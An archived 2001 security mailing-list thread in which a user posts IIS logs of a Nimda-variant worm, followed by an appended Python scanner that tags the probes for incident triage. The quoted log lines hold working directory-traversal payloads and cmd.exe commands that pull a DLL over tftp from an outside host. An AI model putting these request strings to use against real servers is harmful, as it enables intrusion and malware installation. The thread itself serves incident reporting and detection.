RE: New Worm Variant?

From: Kester, Kelly (KesterKat_private)
Date: Tue Oct 30 2001 - 06:56:16 PST


    NIMDA.E (new variant)
    http://www.sarc.com/avcenter/venc/data/w32.nimda.eat_private
    
    -----Original Message-----
    From: Aj Effin Reznor [mailto:ajat_private]
    Sent: Tuesday, October 30, 2001 1:20 AM
    To: incidentsat_private
    Subject: New Worm Variant?
    
    
    
    Anyone seen a new worm doing something like this?
    
    Checking back through my logs, I haven't had a NIMDA instance yet looking
    for httpodbc.dll.  Caught my eye.  Anyone else?  (Yes, some produce a
    code 200 rather than 404, that's to be expected on this system).
    
    Log times are in PST
    
    [29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438 "-" "-"
    [29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-"
    [29/Oct/2001:17:08:44 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 384 "-" "-"
    [29/Oct/2001:17:08:52 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 436 "-" "-"
    [29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
    [29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:09:21 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:09:30 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:09:30 -0800] "GET /c/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
    [29/Oct/2001:17:09:40 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:09:52 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:10:01 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:10:11 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
    [29/Oct/2001:17:10:11 -0800] "GET /d/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
    [29/Oct/2001:17:10:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
    [29/Oct/2001:17:10:30 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:10:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:10:47 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:10:55 -0800] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0" 200 393 "-" "-"
    [29/Oct/2001:17:11:03 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-"
    [29/Oct/2001:17:11:12 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:11:21 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:11:30 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:11:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
    [29/Oct/2001:17:11:48 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-"
    [29/Oct/2001:17:11:57 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:12:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:12:15 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
    [29/Oct/2001:17:12:24 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
    [29/Oct/2001:17:12:33 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" "-"
    [29/Oct/2001:17:12:43 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
    [29/Oct/2001:17:12:55 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
    [29/Oct/2001:17:13:04 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
    [29/Oct/2001:17:13:13 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll HTTP/1.0" 200 442 "-" "-"
    [29/Oct/2001:17:13:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
    [29/Oct/2001:17:13:33 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:13:42 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:13:51 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
    [29/Oct/2001:17:14:10 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
    [29/Oct/2001:17:14:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:28 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:37 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:14:45 -0800] "GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:14:53 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
    [29/Oct/2001:17:15:07 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:15:19 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:15:28 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
    [29/Oct/2001:17:15:37 -0800] "GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
    [29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
    [29/Oct/2001:17:15:38 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
    [29/Oct/2001:17:15:50 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 414 "-" "-"
    [29/Oct/2001:17:15:59 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
    [29/Oct/2001:17:16:08 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
    [29/Oct/2001:17:16:17 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
    [29/Oct/2001:17:16:26 -0800] "GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0" 200 397 "-" "-"
    [29/Oct/2001:17:16:37 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
    [29/Oct/2001:17:16:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:16:55 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:17:04 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
    [29/Oct/2001:17:17:13 -0800] "GET /scripts/..%252f../httpodbc.dll HTTP/1.0" 200 393 "-" "-"
    
    
    
    -aj.
    
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
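A triage scanner for the probe pattern aj quotes, added here as an example and not code from the original post or from SecurityFocus. It runs over a handful of the log lines above (plus one constructed benign request) and tags what a responder would want to sort by: the traversal encodings (double-encoded %255c, %25%35%63 and %%35%63; the overlong or malformed UTF-8 pairs %c0%af, %c1%9c, %c1%1c, %c0%2f), cmd.exe/root.exe invocation, the command passed after /c, the tftp pull together with its source address, and requests for httpodbc.dll. It generalises slightly beyond the post by normalising every encoding seen in the log through one decoder. The log layout (no client address column, as posted), tag names and helper names are this example's own assumptions. As aj notes, a 200 on a cmd.exe request is not by itself proof the command ran, so the summary counts those separately rather than declaring a compromise.

```python
"""Triage scanner for the Nimda-style probe pattern quoted in the post.

Added example, not code from the original post or from SecurityFocus.
Log layout, tag names and helper names are this example's own assumptions."""
import re
from typing import Optional
from urllib.parse import unquote_plus, unquote_to_bytes

# Entries copied from the log quoted in the post, plus one constructed
# benign request (index.html) so the scanner has something to leave alone.
SAMPLE_LOG = """\
[29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438 "-" "-"
[29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-"
[29/Oct/2001:17:10:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:12:33 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" "-"
[29/Oct/2001:17:14:10 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:16:26 -0800] "GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0" 200 397 "-" "-"
[29/Oct/2001:17:20:00 -0800] "GET /index.html HTTP/1.0" 200 1234 "-" "-"
"""

# Request-line fields as they appear in the post (no client address column).
LINE_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

# Malformed / overlong UTF-8 byte pairs used in the log in place of '/' and '\'
# (%c0%af, %c1%9c, %c1%1c, %c0%2f); the server's decoder took them as separators.
OVERLONG_SEPARATORS = (b'\xc0\xaf', b'\xc1\x9c', b'\xc1\x1c', b'\xc0\x2f')
OVERLONG_RE = re.compile(r'%c[01]%[0-9a-f]{2}', re.I)


def normalize_path(raw_path: str):
    """Percent-decode until stable (at most 3 rounds), fold overlong separators
    and backslashes into '/', and return (path, rounds_that_changed_it).
    rounds >= 2 means the path was double-encoded (%255c, %25%35%63, %%35%63)."""
    data = raw_path.encode('latin-1', 'replace')
    rounds = 0
    for _ in range(3):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    for seq in OVERLONG_SEPARATORS:
        data = data.replace(seq, b'/')
    return data.decode('latin-1').replace('\\', '/'), rounds


def classify(line: str) -> Optional[dict]:
    """Parse one log line and attach triage tags; None if the line does not parse."""
    m = LINE_RE.search(line)
    if not m:
        return None
    raw_path, _, raw_query = m['target'].partition('?')
    path, rounds = normalize_path(raw_path)
    query = unquote_plus(raw_query)          # '/c+tftp%20-i%20...' -> '/c tftp -i ...'
    tags = []
    if '/../' in path:
        tags.append('traversal')
    if rounds >= 2:
        tags.append('double-encoded')
    if OVERLONG_RE.search(raw_path):
        tags.append('overlong-utf8')
    if re.search(r'/(cmd|root)\.exe$', path, re.I):
        tags.append('shell')
    if query.lower().startswith('/c '):       # cmd.exe /c <command ...>
        tags.append('cmd:' + query[3:].split(' ', 1)[0].lower())
    pull = re.search(r'\btftp\b.*?(\d{1,3}(?:\.\d{1,3}){3})', query, re.I)
    if pull:
        tags.append('tftp-from:' + pull.group(1))
    if path.lower().endswith('/httpodbc.dll'):
        tags.append('httpodbc.dll')
    return {'ts': m['ts'], 'status': int(m['status']), 'path': path,
            'query': query, 'tags': tags}


def scan(log_text: str) -> list:
    """Return the parsed records that carry at least one tag."""
    hits = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec['tags']:
            hits.append(rec)
    return hits


def summarize(hits: list) -> dict:
    """Roll up what a responder wants first: the tftp source(s) and how many
    shell requests got a 200.  A 200 alone is not proof the command ran."""
    sources = sorted({t[len('tftp-from:'):] for h in hits
                      for t in h['tags'] if t.startswith('tftp-from:')})
    shell_200 = sum(1 for h in hits if 'shell' in h['tags'] and h['status'] == 200)
    return {'hits': len(hits), 'tftp_sources': sources, 'shell_200': shell_200}


if __name__ == '__main__':
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h['ts'], h['status'], h['path'], h['tags'])
    print(summarize(found))
```

The decode loop is the part worth keeping: a single unquote misses %255c and %%35%63 entirely, and the overlong pairs never decode to a separator at all, so both have to be handled before any "/../" check is meaningful. Feeding a full day's log through scan() and grouping by the tftp-from tag gives the pull source(s) to block at the border and the list of hosts to check for a dropped httpodbc.dll.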
    
    



    This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 07:19:59 PST